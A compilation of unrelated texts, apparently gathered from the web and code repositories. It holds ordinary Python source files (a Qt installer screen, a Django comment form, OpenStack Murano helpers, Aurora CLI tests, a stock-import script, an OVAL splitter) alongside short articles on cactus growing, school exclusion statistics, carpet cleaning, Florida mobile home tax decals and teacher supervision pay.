    def setTime(self):
        """Apply the selected date/time to the system and hardware clock."""
        # NOTE(review): yali.util is not among this module's visible imports;
        # presumably provided via the yali package -- confirm.
        ctx.interface.informationWindow.update(_("Adjusting time settings"))
        date = self.ui.calendarWidget.date()
        time = self.ui.timeEdit.time()
        args = "%02d%02d%02d%02d%04d.%02d" % (date.month(), date.day(),
                                              time.hour(), time.minute(),
                                              date.year(), time.second())

        # Set current date and time
        ctx.logger.debug("Date/Time setting to %s" % args)
        yali.util.run_batch("date", [args])

        # Sync date time with hardware
        ctx.logger.debug("YALI's time is syncing with the system.")
        yali.util.run_batch("hwclock", ["--systohc"])
        ctx.interface.informationWindow.hide()

    def execute(self):
        """Commit the screen: set the clock if edited, store the selected
        timezone, and (STEP_BASE) initialise storage before advancing.
        Returns True to advance, False to stay on this screen."""
        if not self.timer.isActive() or self.is_date_changed:
            QTimer.singleShot(500, self.setTime)
            self.timer.stop()

        index = self.ui.countryList.currentIndex()
        ctx.installData.timezone = self.ui.countryList.itemData(index).toString()
        ctx.logger.debug("Time zone selected as %s " % ctx.installData.timezone)

        if ctx.flags.install_type == ctx.STEP_BASE:
            #FIXME:Refactor hacky code
            ctx.installData.rootPassword = ctx.consts.default_password
            ctx.installData.hostName = yali.util.product_release()
            if ctx.storageInitialized:
                disks = filter(lambda d: not d.format.hidden, ctx.storage.disks)
                if len(disks) == 1:
                    # single disk: skip the disk-selection step
                    ctx.storage.clearPartDisks = [disks[0].name]
                    ctx.mainScreen.step_increment = 2
                else:
                    ctx.mainScreen.step_increment = 1
                return True
            else:
                # storage not ready yet: show a wait box and initialise
                # in the background, then advance from initFinished()
                self.pds_messagebox.setMessage(_("Storage Devices initialising..."))
                self.pds_messagebox.animate(start=MIDCENTER, stop=MIDCENTER)
                ctx.mainScreen.step_increment = 0
                self.pthread.start()
                QTimer.singleShot(2, self.startStorageInitialize)
                return False

        return True

    def startInit(self):
        # PThread worker: just show the wait box
        self.pds_messagebox.animate(start=MIDCENTER, stop=MIDCENTER)

    def startStorageInitialize(self):
        """Run storage initialisation and then resume screen flow."""
        ctx.storageInitialized = yali.storage.initialize(ctx.storage, ctx.interface)
        self.initFinished()

    def initFinished(self):
        """Hide the wait box and advance (or re-enable Back on failure)."""
        self.pds_messagebox.animate(start=CURRENT, stop=CURRENT, direction=OUT)
        disks = filter(lambda d: not d.format.hidden, ctx.storage.disks)
        if ctx.storageInitialized:
            if len(disks) == 1:
                ctx.storage.clearPartDisks = [disks[0].name]
                ctx.mainScreen.step_increment = 2
            else:
                ctx.mainScreen.step_increment = 1
            ctx.mainScreen.slotNext(dry_run=True)
        else:
            ctx.mainScreen.enableBack()
|
This cactus is very interesting for cultivation for several reasons. Firstly, this cactus grows in mountains and in winter it is covered by snow for several months. Few cacti in the world can do that. For this same reason, it is very important to carry out cold stratification of the seeds. Secondly, this cactus is edible and has very big fruits, compared to its size. Thirdly, it grows fast and begins fruiting in just a few years. You should consider that most edible cacti may take up to 10 years before starting to produce fruits. This one is fast.
Maihuenia poeppigii (Otto ex Pfeiffer) Phil. ex K. Schum. More photos of this plant can be seen here.
|
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import force_unicode
from django.conf import settings
from ella.utils.timezone import now
from threadedcomments.forms import ThreadedCommentForm
class AuthorizedCommentForm(ThreadedCommentForm):
    """
    Comment form for authenticated users: identity comes from ``user``
    (set by the caller) instead of the anonymous name/email/url fields.
    """
    # Assigned by the view to the authenticated User posting the comment.
    user = None

    def __init__(self, *args, **kwargs):
        "there is no such thing as user_name, user_email, user_url"
        super(AuthorizedCommentForm, self).__init__(*args, **kwargs)
        # drop the anonymous-poster fields inherited from ThreadedCommentForm
        self.fields.pop('name')
        self.fields.pop('email')
        self.fields.pop('url')

    def check_for_duplicate_comment(self, new):
        """
        copy paste of check_for_duplicate_comment from ``django.contrib.comments.forms``
        so we can let the decision of which db to use on router
        """
        # _default_manager (instead of an explicit db alias) lets the
        # database router pick the database
        possible_duplicates = self.get_comment_model()._default_manager.filter(
            content_type = new.content_type,
            object_pk = new.object_pk,
            user_name = new.user_name,
            user_email = new.user_email,
            user_url = new.user_url,
        )
        # same content on the same day counts as a duplicate; return the
        # existing comment instead of the new one
        for old in possible_duplicates:
            if old.submit_date.date() == new.submit_date.date() and old.comment == new.comment:
                return old

        return new

    def get_comment_create_data(self):
        "so remove it from comment create date"
        # identity fields are derived from self.user rather than form input
        return dict(
            parent_id = self.cleaned_data['parent'],
            title = self.cleaned_data['title'],
            content_type = ContentType.objects.get_for_model(self.target_object),
            object_pk = force_unicode(self.target_object._get_pk_val()),
            user_name = self.user.get_full_name() or self.user.username,
            user_email = self.user.email,
            comment = self.cleaned_data["comment"],
            submit_date = now(),
            site_id = settings.SITE_ID,
            is_public = True,
            is_removed = False,
        )
|
Statistics published by the Department for Education today show that pupils with statements are nine times more likely to be permanently excluded from school than those pupils without any SEN. Meanwhile, the number of pupils with statements of SEN receiving one or more fixed period exclusions is six times higher than for pupils with no SEN.
The Statistical First Release (SFR) provides information about exclusions from schools and exclusion appeals in England during 2010/11. It reports national trends in the number of permanent and fixed-period exclusions together with information on the characteristics of excluded pupils such as age, gender, ethnicity, free school meal eligibility, and special educational needs (SEN) as well as the reasons for exclusion.
There were 5080 permanent exclusions from state-funded primary, state-funded secondary and all special schools in 2010/11.
In 2010/11 there were 271,980 fixed-period exclusions from state-funded secondary schools, 37,790 fixed-period exclusions from state-funded primary schools and 14,340 fixed-period exclusions from special schools.
The average length of a fixed-period exclusion in state-funded secondary schools was 2.4 days, for state-funded primary schools the average length of a fixed-period exclusion was 2.1 days.
The permanent exclusion rate for boys was approximately three times higher than that for girls. The fixed-period exclusion rate for boys was almost three times higher than that for girls.
Pupils with SEN with statements are around nine times more likely to be permanently excluded than those pupils with no SEN.
Children who are eligible for free school meals are nearly four times more likely to receive a permanent exclusion and around three times more likely to receive a fixed-period exclusion than children who are not eligible for free school meals.
What are we to make of these statistics? I'm certainly no analyst but the figures surely speak for themselves. Of course, we can't see what kind of SEN we're talking about but the reasons for exclusion included physical or verbal assault against a pupil or adult, bullying or racist abuse and persistent disruptive behaviour among other reasons, most of which contain criminal aspects. These things should not, quite rightly, be tolerated, but it's the reasons behind the category of persistent disruptive behaviour that interests me.
A mainstream school it would seem is, quite often, unable to cope with the high level of demands placed upon it by children with special educational needs and challenging behaviour and for these children, inclusion is the last thing they need. They need a specialised environment that can help them overcome difficulties of background or learning style or hidden disability so they have the same chance of a successful life as everyone else. Timely intervention is crucial for these children so that they can be identified and assisted long before things get to the stage of an exclusion being considered.
When thinking specifically of children with statements, I wonder what percentage of these SEN children, or of children with SEN but without statements, were excluded for persistent disruptive behaviour compared to the other reasons above. A child displaying persistent disruptive behaviour almost certainly has underlying issues, whether BESD, ADHD, ASD etc, that prevents them from accessing the curriculum and hence makes them feel that school is a waste of time.
A large percentage were also recipients of free school meals, which also indicates that poor children (with or without SEN) are hugely at risk of not getting the support they need in a mainstream school environment. Many may come from difficult family backgrounds and would be much more suited to a nurture group environment such as those set up by child psychologist Charlie Mead, if only they existed more widely.
There is much interesting analysis that can be taken from these stats aside from the startling SEN figures, for example the comparatively high ratio of exclusions for traveller children (who may or may not have SEN). These would take far more time to ponder than I have available, but I hope someone does and lets me know.
The Every Child in Need Campaign – help needed!
A possible explanation for a correlation between certain social groups and sen pupils being excluded is the ignorance of many teachers about the wider world. Cocooned in their bubble they perceive any socio-economic difference to their own social norms (eg: poor, traveller or single parent in a council house) as being the reason for a child’s disruptive behaviour and not the child’s sen. Yes, I speak from the bitter end of this experience and would like to see some research into the prevalence of school exclusions amongst pupils with sen and their socio-economic group. Instinct tells me that the exclusions of sen pupils amongst the socio-economic groups that most teachers self-identify with will have lower levels of exclusion than sen pupils from other differentiated socio-economic groups.
|
# Copyright (c) 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import types
from oslo_utils import timeutils
from webob import exc
from murano.common.i18n import _
from murano.common import utils
from murano.db.services import environment_templates as env_temp
from murano.db.services import environments as envs
from murano.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class CoreServices(object):
    """Static helpers for reading and mutating the service descriptions
    stored for environments and environment templates.
    """

    @staticmethod
    def get_service_status(environment_id, service_id):
        """Service can have one of three distinguished statuses:

         - Deploying: if environment has status deploying and there is at least
           one orchestration engine report for this service;
         - Pending: if environment has status `deploying` and there is no
           report from orchestration engine about this service;
         - Ready: If environment has status ready.

        :param environment_id: Service environment, we always know to which
            environment service belongs to
        :param service_id: Id of service for which we checking status.
        :return: Service status
        """
        # Now we assume that service has same status as environment.
        # TODO(ruhe): implement as designed and described above
        return envs.EnvironmentServices.get_status(environment_id)

    @staticmethod
    def get_data(environment_id, path, session_id=None):
        """Return the environment description subtree addressed by *path*.

        :param environment_id: id of the environment to read
        :param path: slash-separated path into the description
        :param session_id: optional session whose draft description is used
        :return: the addressed data; [] when no services exist yet; None
            when the environment description itself is missing
        """
        get_description = envs.EnvironmentServices.get_environment_description
        env_description = get_description(environment_id, session_id)

        if env_description is None:
            return None

        if 'services' not in env_description:
            return []

        result = utils.TraverseHelper.get(path, env_description)

        if path == '/services':
            # Decorate each listed service with its status (currently the
            # environment-wide status, see get_service_status).
            get_status = CoreServices.get_service_status
            for srv in result:
                srv['?']['status'] = get_status(environment_id, srv['?']['id'])

        return result

    @staticmethod
    def get_template_data(env_template_id, path):
        """It obtains the data for the template. It includes
        all the services. In case the path includes information
        such as the env_template_id, the information provided will
        be related to the entity specified in the path

        :param env_template_id: The env_template_id to obtain the data
        :param path: slash-separated path into the template description
        :return: The template description
        :raises exc.HTTPNotFound: when nothing exists at *path*
        """
        temp_description = env_temp.EnvTemplateServices.\
            get_description(env_template_id)
        if temp_description is None:
            return None

        if 'services' not in temp_description:
            return []

        result = utils.TraverseHelper.get(path, temp_description)
        if result is None:
            msg = _('Environment Template <EnvId {0}> is not found').format(
                env_template_id)
            LOG.error(msg)
            raise exc.HTTPNotFound(explanation=msg)
        return result

    @staticmethod
    def post_env_template_data(env_template_id, data, path):
        """It stores the template data inside the template
        description.

        :param env_template_id: The env_template_id to obtain the data
        :param data: the data to store (a single service or a list of them)
        :param path: slash-separated path into the template description
        :return: the stored data
        :raises exc.HTTPNotFound: when the template does not exist
        """
        get_description = env_temp.EnvTemplateServices.get_description
        save_description = env_temp.EnvTemplateServices.save_description

        temp_description = get_description(env_template_id)
        if temp_description is None:
            msg = _('Environment Template <EnvId {0}> is not found').format(
                env_template_id)
            LOG.error(msg)
            raise exc.HTTPNotFound(explanation=msg)

        if 'services' not in temp_description:
            temp_description['services'] = []

        if path == '/services':
            # A posted list extends the services collection; a single
            # entry is inserted at the path.
            if isinstance(data, types.ListType):
                utils.TraverseHelper.extend(path, data, temp_description)
            else:
                utils.TraverseHelper.insert(path, data, temp_description)

        save_description(temp_description)
        return data

    @staticmethod
    def post_application_data(env_template_id, data, path):
        """It stores the application data inside the template
        description.

        :param env_template_id: The env_template_id to obtain the data
        :param data: the application data to store
        :param path: slash-separated path into the template description
        :return: the stored data
        :raises exc.HTTPNotFound: when the template does not exist
        """
        get_description = env_temp.EnvTemplateServices.get_description
        save_description = env_temp.EnvTemplateServices.save_description

        temp_description = get_description(env_template_id)
        if temp_description is None:
            msg = _('Environment Template <EnvId {0}> is not found').format(
                env_template_id)
            LOG.error(msg)
            raise exc.HTTPNotFound(explanation=msg)

        if 'services' not in temp_description:
            temp_description['services'] = []

        if path == '/services':
            # Same insert-or-extend rule as post_env_template_data; the
            # only difference is that the save call carries the id.
            if isinstance(data, types.ListType):
                utils.TraverseHelper.extend(path, data, temp_description)
            else:
                utils.TraverseHelper.insert(path, data, temp_description)

        save_description(temp_description, env_template_id)
        return data

    @staticmethod
    def post_data(environment_id, session_id, data, path):
        """Store *data* at *path* in an environment's draft description.

        :param environment_id: id of the environment to modify
        :param session_id: session holding the draft description
        :param data: the data to store (a single service or a list)
        :param path: slash-separated path into the description
        :return: the stored data
        :raises exc.HTTPNotFound: when the environment does not exist
        """
        get_description = envs.EnvironmentServices.get_environment_description
        save_description = envs.EnvironmentServices.\
            save_environment_description

        env_description = get_description(environment_id, session_id)
        if env_description is None:
            msg = _('Environment <EnvId {0}> is not found').format(
                environment_id)
            LOG.error(msg)
            raise exc.HTTPNotFound(explanation=msg)

        if 'services' not in env_description:
            env_description['services'] = []

        if path == '/services':
            # A posted list extends the services collection; a single
            # entry is inserted at the path.
            if isinstance(data, types.ListType):
                utils.TraverseHelper.extend(path, data, env_description)
            else:
                utils.TraverseHelper.insert(path, data, env_description)

        save_description(session_id, env_description)
        return data

    @staticmethod
    def put_data(environment_id, session_id, data, path):
        """Replace the data at *path* in an environment's draft description.

        Also stamps the description's ``?/updated`` field with the
        current UTC time.
        """
        get_description = envs.EnvironmentServices.get_environment_description
        save_description = envs.EnvironmentServices.\
            save_environment_description

        env_description = get_description(environment_id, session_id)
        utils.TraverseHelper.update(path, data, env_description)
        env_description['?']['updated'] = str(timeutils.utcnow())
        save_description(session_id, env_description)
        return data

    @staticmethod
    def delete_data(environment_id, session_id, path):
        """Remove the data at *path* from an environment's draft
        description and save the result.
        """
        get_description = envs.EnvironmentServices.get_environment_description
        save_description = envs.EnvironmentServices.\
            save_environment_description

        env_description = get_description(environment_id, session_id)
        utils.TraverseHelper.remove(path, env_description)
        save_description(session_id, env_description)

    @staticmethod
    def delete_env_template_data(env_template_id, path):
        """It deletes a template.

        :param env_template_id: The env_template_id to be deleted.
        :param path: The path to check.
        :raises exc.HTTPNotFound: when the template does not exist
        """
        get_description = env_temp.EnvTemplateServices.get_description
        save_description = env_temp.EnvTemplateServices.save_description

        tmp_description = get_description(env_template_id)
        if tmp_description is None:
            msg = _('Environment Template <EnvId {0}> is not found').format(
                env_template_id)
            LOG.error(msg)
            raise exc.HTTPNotFound(explanation=msg)

        utils.TraverseHelper.remove(path, tmp_description)
        save_description(tmp_description, env_template_id)
|
There are several advantages to hiring professional carpet cleaners to help you clean your carpet. If this has never been an option for you before, it is time you start considering it. Some of the benefits you can get from hiring professional carpet cleaners are better cleaning services than you could ever hope to get from all the effort you put in, solutions for any kind of dirt and spills, and so much more. Because they are professionally trained, carpet cleaners know how to effectively clean carpets with the best tools possible.
In addition to removing just dust and dirt, professional carpet cleaners are also highly capable of removing allergens from your carpet, ensuring that your carpet is clean and germ free. This will safeguard you from possible allergies and health concerns. Part of the reason that it is important to use professional carpet cleaners for removing allergens is that they use advanced equipment as well as methodology. This increases the suction power of their tools and by extension the overall effect of the cleaning process. The ultimate result is that your carpet is thoroughly cleaned and will provide you relief. If you or any of your family members suffer from allergies, regularly using professional carpet cleaners will greatly ease your discomfort and allow you to live comfortably.
Hiring a professional carpet cleaner will also improve the aesthetic beauty of your carpet. This is important as you usually use carpets to improve the aesthetic appeal of any room. Any kind of carpet adorning a room is usually the first thing that catches the eye of any visitor. The visual appeal of carpets can only be enhanced when they are properly and thoroughly cleaned. No matter how much effort and time you put in, you will not be able to achieve the standards of a professional carpet cleaner. Hired professionals using their specialised modern technology, tools, and gears can make your carpet look as good as new.
Yet another benefit is that you can use these professionals to help you clean your curtains and other upholstery as well along with your carpet. Calling them just once as a trial will show you the several advantages of hiring professional cleaners for your cleaning purposes. At the end of this visit, you are sure to feel the difference of an absolutely clean room that looks fresh and new.
In addition to all of the services mentioned above, also remember that you can save a lot of your time as well as effort and this is one of the main reasons you should consider hiring a professional carpet cleaning service. You can simply take a step back and relax while your house is brought to being as good as new. You can use this time to relax and maybe even pursue a new hobby!
The advantages listed above have hopefully opened your eyes to the advantages of hiring a professional carpet cleaning service for not only your carpet but also all your upholstery. But, make sure before you hire a service that you do sufficient research and talk to previous clients in order to ensure you are getting the best value for your money. The advantages you stand to gain are huge and not just minor. Before you decide to hire a professional service permanently, make sure to try out a few different ones.
Next article How Cloud will support the Internet of Things?
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import textwrap
from mock import patch
from twitter.common.contextutil import temporary_file
from apache.aurora.client.cli import EXIT_COMMAND_FAILURE
from apache.aurora.client.cli.client import AuroraCommandLine
from .util import AuroraClientCommandTest, FakeAuroraCommandContext
class TestClientCreateCommand(AuroraClientCommandTest):
  """Tests for the ``aurora config list`` noun/verb of the client CLI."""

  def test_list_configs(self):
    """A valid config file lists its fully-qualified job keys on stdout."""
    mock_context = FakeAuroraCommandContext()
    with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
        return_value=mock_context):
      with temporary_file() as fp:
        fp.write(self.get_valid_config())
        fp.flush()
        cmd = AuroraCommandLine()
        cmd.execute(['config', 'list', fp.name])
        assert mock_context.out == ['jobs=[west/bozo/test/hello]']
        assert mock_context.err == []

  def test_list_configs_invalid(self):
    """A config file with a syntax error fails with a loading error."""
    mock_context = FakeAuroraCommandContext()
    with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
        return_value=mock_context):
      with temporary_file() as fp:
        fp.write(self.get_invalid_config("blather=..."))
        fp.flush()
        cmd = AuroraCommandLine()
        result = cmd.execute(['config', 'list', fp.name])
        assert result == EXIT_COMMAND_FAILURE
        assert mock_context.out == []
        assert any(line.startswith("Error loading configuration file: invalid syntax") for line in
            mock_context.err)

  def get_config_with_no_jobs(self):
    # Valid config source that defines a Job template but never binds it
    # into `jobs`, so the listing should come back empty.
    return textwrap.dedent("""
      HELLO_WORLD = Job(
        name = '%(job)s',
        role = '%(role)s',
        cluster = '%(cluster)s',
        environment = '%(env)s',
        instances = 20,
        update_config = UpdateConfig(
          batch_size = 5,
          watch_secs = 10,
          max_per_shard_failures = 2,
        ),
        task = Task(
          name = 'test',
          processes = [Process(name = 'hello_world', cmdline = 'echo {{thermos.ports[http]}}')],
          resources = Resources(cpu = 0.1, ram = 64 * MB, disk = 64 * MB),
        )
      )
      """)

  def test_list_configs_nojobs(self):
    """A config that binds no jobs lists an empty job set."""
    mock_context = FakeAuroraCommandContext()
    with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
        return_value=mock_context):
      with temporary_file() as fp:
        fp.write(self.get_config_with_no_jobs())
        fp.flush()
        cmd = AuroraCommandLine()
        cmd.execute(['config', 'list', fp.name])
        assert mock_context.out == ["jobs=[]"]
        assert mock_context.err == []
|
The Property Appraiser is required by law to determine how your Mobile Home (also known as a Manufactured Home) will be classified for property tax purposes. The classification is based upon whether or not it is located on land owned by the Mobile Home owner or on land owned by another (i.e., Mobile Home Park).
I just purchased a Mobile Home for the first time and put it on my lot. Is there anything I have to do?
Yes. Pursuant to Florida Statutes, if you own the land and the Mobile Home, you must apply for Real Property (RP) decals and declare the Mobile Home as real property. When you first purchased the Mobile Home, you should have been issued a decal that expires December 31 of that year.
How do I get a Real Property (RP) decal?
Visit either one of the Property Appraiser's Offices and bring the deed to the land and the Title or Registration to the Mobile Home (two Titles or Registrations if it is a double wide). The staff will complete a DR-402 form which declares the Mobile Home to be real property. This form should be taken to the Tax Collector's Office, where you may purchase a Real Property (RP) decal which is valid for as long as you own both the Mobile Home and the land.
How often do I purchase a Real Property (RP) decal?
You only have to purchase a Real Property (RP) decal one time. If the Mobile Home is already on the land when you purchase it, the previous owner may have already purchased a Real Property (RP) decal. If so, you do not have to purchase new ones, unless the decal is not visible on the home.
If I did not receive a title or registration when I purchased my mobile home, will I be able to purchase my real property (RP) decal?
No. The Title needs to be transferred to the owner of the land before a Real Property (RP) decal can be issued. Contact the Tax Collector's Office for more information.
How long does the dealer have to get the Manufacturer's Statement of Origin and the Title application to the Tax Collector so I may get my registration?
The dealer has 30 days from the date of closing. The Tax Collector will issue a registration for the Mobile Home and send the Manufacturer's Statement Of Origin and title application to the Department of Motor Vehicles where the Title is processed. The Title will be mailed to the owner if there is no lien on the Mobile Home. If there is a lien, it will be mailed to the lienholder.
After I purchase my Real Property (RP) decal, do I have to place it on my Mobile Home?
Yes. If the Mobile Home is a singlewide, place the decal in a window that is visible to the appraiser. If the Mobile Home is a doublewide, be sure to put the proper decal on the half which is specified on the registration. Your home will be assessed as real property and you will be required to pay taxes on the Mobile Home, land and attachments.
I purchased a Mobile Home in another county and moved it onto my property here. The Mobile Home already has a Real Property (RP) decal. Do I still need to apply for my own?
Once a Mobile Home is assessed as real property, will it be treated the same next year?
Yes. The Mobile Home will be assessed to the landowner unless the landowner can provide to the Property Appraiser's Office a registration or title in the name of the individual to be assessed.
If I do not own the land, where and how do I purchase a Mobile Home (MH) decal and how much do these decals cost?
This decal must be purchased each year during the month of December from the Tax Collector's Office. The prior year's Mobile Home (MH) decal is valid until December 31. (The Tax Collector has a rate schedule used for computation of decal prices and the rate is determined by the length of the mobile home.) Singlewides need one decal, doublewides need two, etc.
Does the Mobile Home (MH) decal exclude my Mobile Home from a property tax assessment?
In part, it does. The Mobile Home (MH) decal only covers the mobile itself. It does not cover any attachments (i.e., air conditioning units, carports, etc.).
If my Mobile Home has been assessed for taxation because I have been delinquent in purchasing a decal, how do I get the Mobile Home portion taken off the tax roll?
You must purchase decals for all the years you were delinquent, except for those years you paid tax on the Mobile Home. You must show proof that you have brought your decals up to date and that the Mobile Home owner does not own the land. Once proof of ownership has been provided and decals are current, the Mobile Home portion of the assessment can be deleted from the tax roll.
When do my Mobile Home (MH) decals expire?
Mobile Home (MH) decals expire on December 31. Travel trailer or recreational vehicles have license plates which expire on your birthday.
Is the assessment and taxation of Mobile Homes the same as it is for houses?
Not always. Mobile Homes in parks where the Mobile Home owner rents lot space from the park are taxed through the annual purchase of a Mobile Home (MH) decal. The attachments to the Mobile Home are assessed and taxed as Tangible Personal Property. The major portion of the tax, which is on the land, is paid by the owner of the park.
Am I required to obtain and file a Tangible Personal Property tax return on my Mobile Home and its attachments?
Hernando County does not require tax returns to be filed for Mobile Homes. The Property Appraiser's Office goes out to measure and assess Mobile Homes and attachments to insure uniformity in value.
I own a recreational vehicle and a park trailer. Do I have to register them as Mobile Homes?
No. When a trailer is being registered for the first time in the applicant's name, the recreational vehicle must be classified as such and registered with a license plate and validation decal instead of a Mobile Home (MH) or permanent decal. A Real Property (RP) decal will be issued if the travel trailer is affixed to the owner's land.
Can a Mobile Home owner qualify for Homestead Exemption?
If you hold title to a permanently affixed Mobile Home and the land on which it is situated, you must make application to the Property Appraiser's Office for a Real Property (RP) decal. The decal is purchased at the Tax Collector's Office. The Mobile Home and land will be assessed as real property. Homestead Exemption may be granted if the Mobile Home meets those requirements and you qualify for the exemption.
I own the land and the Mobile Home but I do not have a Real Property (RP) decal. Will this affect my Homestead Exemption?
Yes. When you apply for the Homestead Exemption, you must also apply for your Real Property (RP) decal if you have not already done so or the previous owner did not have one. If you are not sure if you have one, you need to contact the Tax Collector's Office and get a replacement decal.
What if I cannot get my Title or Registration in time to file for the Homestead Exemption?
As long as the Mobile Home was on the property January 1 of the year filing, and you meet all other criteria, you can file for a Homestead Exemption. You do need to get your Title or Registration as soon as possible, or your exemption for the current year may be denied. You need to contact either the dealer, title company or lien holder (if financing is involved) and make sure the Manufacturer's Statement of Origin or Title has been sent to the Tax Collector's Office to generate a registration. (You may not receive the actual Title until the lien is paid in full.) You must bring the Title or Registration to the Property Appraiser's Office and apply for your Real Property (RP) decal.
Our GIS Interative Map can assist you. Select the Location tab within the Parcel Summary.
|
#!/usr/bin/python3
# Run the regular daily import of data, with error logging
#
# Author: Alex Zylstra
# Date: 2014/05/17
# License: MIT
from DB import DB, FILE
from scripts import *
from fetch import *
import datetime
import logging
logging.basicConfig(filename='StockDB.log',level=logging.INFO)
import smtplib
def run():
    """Run the daily data import and email a summary report.

    Import errors are logged to StockDB.log; a summary is then sent via
    the local SMTP server. Failures while emailing are logged, not fatal.
    """
    errors = add_all_to_db()
    for err in errors:
        logging.error("Error: {0}".format(err))

    # Attempt to email:
    try:
        # isoformat() gives zero-padded, sortable YYYY-MM-DD dates
        # (the previous str(y)+'-'+str(m) form produced e.g. 2014-5-7).
        date = datetime.date.today().isoformat()
        fromaddr = 'root@db.azylstra.net'
        toaddrs = ['alex@azylstra.net']

        # Construct the message with From/To/Subject headers so that
        # MTAs and mail clients handle/display it correctly.
        subject = "StockDB report"
        body = 'Date: ' + date + '\n'
        body += 'Number of errors: ' + str(len(errors)) + '\n\n'
        for err in errors:
            body += "Error: {0}".format(err) + '\n'
        msg = 'From: %s\nTo: %s\nSubject: %s\n\n%s' % (
            fromaddr, ', '.join(toaddrs), subject, body)

        server = smtplib.SMTP('localhost')
        server.sendmail(fromaddr, toaddrs, msg)
        server.quit()
    except Exception as err:
        logging.error("Error: {0}".format(err))
# Kick off the daily import as soon as this script is executed.
run()
|
Professor Peter Aubusson (left) from the University of Technology and Charles Sturt University Executive Dean Professor Toni Downes (right) sign agreements with Federation General Secretary John Dixon about payments for teachers supervising prac students.
Significant salary increases have been achieved for teachers supervising teacher education ‘professional experience’ placements in NSW public schools.
From 2015, supervising teachers will receive an all-inclusive daily payment of $28.50 per student (a 34.4 per cent rise). This increases to $29.25 (2.6 per cent) in 2016 and $30 (2.6 per cent) in 2017 in recognition of the work teachers undertake in the professional development of teacher education students.
The payment does not apply to the supervision of teacher education students undertaking internships as part of their university’s professional experience program. Payments for those types of internships are under separate agreements.
So far Federation has signed agreements with the University of Technology, Sydney, and Charles Sturt, NSW, Sydney and Newcastle universities. The union has in-principle agreements with Southern Cross, New England, Wollongong, Australian Catholic and Notre Dame universities and these agreements are expected to be settled for the new academic year.
The union encourages members to participate in the supervision of teacher education students on professional experience placements. The profession needs to ensure that teacher education students are prepared for their future careers in classrooms through quality professional experience in NSW public schools.
Federation has stressed that teachers’ professional judgement should be respected in the assessment of future teachers under their supervision in the union's discussions with universities.
|
#!/usr/bin/python
import sys
import os
import errno
import string
import re
from optparse import OptionParser
import lxml.etree as ET
# Namespace prefix -> URI map for the OVAL 5 schemas referenced below
# (used both for XPath queries and for pretty namespace registration).
xmlns = {
    "o": "http://oval.mitre.org/XMLSchema/oval-definitions-5",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
    "oval": "http://oval.mitre.org/XMLSchema/oval-common-5",
    "unix": "http://oval.mitre.org/XMLSchema/oval-definitions-5#unix",
    "linux": "http://oval.mitre.org/XMLSchema/oval-definitions-5#linux",
    "ind": "http://oval.mitre.org/XMLSchema/oval-definitions-5#independent",
}
def parse_options():
    """Parse command-line options; exit with help when no input files."""
    usage = "usage: %prog [options] input_file [input_file . . .]"
    opt_parser = OptionParser(usage=usage, version="%prog ")
    opt_parser.add_option(
        "-o", dest="out_dname", default="/tmp/checks",
        help="name of output directory. If unspecified, default is a new directory \"/tmp/checks\"")
    options, args = opt_parser.parse_args()
    if not args:
        opt_parser.print_help()
        sys.exit(1)
    return options, args
def gather_refs(element, defn):
    """Transitively collect every element that *element* points at through
    a *_ref attribute, appending each one to def_reflist_map[defn]."""
    # Find every descendant carrying any of the known reference attributes.
    referring = []
    for ref_attr in ("test_ref", "var_ref", "state_ref", "object_ref"):
        referring.extend(element.findall(".//*[@%s]" % ref_attr))

    for node in referring:
        for attr_name in node.attrib.keys():
            if not attr_name.endswith("_ref"):
                continue
            target = id_element_map[node.get(attr_name)]
            # Follow each reference only once, so cyclic references
            # cannot recurse forever.
            if target not in def_reflist_map[defn]:
                def_reflist_map[defn].append(target)
                gather_refs(target, defn)
def gather_refs_for_defs(tree):
    """For every OVAL <definition> in *tree*, populate def_reflist_map
    with the list of elements it (transitively) references."""
    # iter() replaces getiterator(), which is deprecated in lxml and was
    # removed from the stdlib ElementTree in Python 3.9. Materialize the
    # iterator since the result is traversed twice below.
    defn_elements = list(tree.iter("{" + xmlns["o"] + "}definition"))
    # initialize dictionary, which maps definitions to a list of those things
    # it references
    for defn in defn_elements:
        def_reflist_map[defn] = []
    for defn in defn_elements:
        gather_refs(defn, defn)
def output_checks(dname):
    """Write one XML file per OVAL definition into directory *dname*.

    Each file holds the definition followed by every element it
    references, wrapped in a <def-group> root element.

    Side effect: changes the process working directory to *dname*.
    """
    try:
        os.makedirs(dname)
    except OSError as e:  # "except X as e" works on Python 2.6+ and 3
        if e.errno != errno.EEXIST:
            raise

    # use namespace prefix-to-uri defined above, to provide abbreviations
    for prefix, uri in xmlns.items():
        ET.register_namespace(prefix, uri)

    os.chdir(dname)
    for defn, reflist in def_reflist_map.items():
        # create filename from id attribute, get rid of punctuation
        # (avoids the Python-2-only str.translate/maketrans deletion API)
        fname = "".join(
            c for c in defn.get("id") if c not in string.punctuation)
        fname = fname + ".xml"

        # output definition, and then all elements that the definition
        # references
        # NOTE(review): tostring() returns bytes on Python 3; this script
        # assumes Python 2 str throughout -- confirm before porting.
        outstring = ET.tostring(defn)
        for ref in reflist:
            outstring = outstring + ET.tostring(ref)

        with open(fname, 'w+') as xml_file:
            # giant kludge: get rid of per-node namespace attributes
            outstring = re.sub(r"\s+xmlns[^\s]+ ", " ", outstring)
            xml_file.write("<def-group>\n" + outstring + "</def-group>")
    return
def gather_ids_for_elements(tree):
    """Index every element carrying an ``id`` attribute into the global
    id_element_map (id string -> element)."""
    for node in tree.findall(".//*[@id]"):
        id_element_map[node.get("id")] = node
id_element_map = {} # map of ids to elements
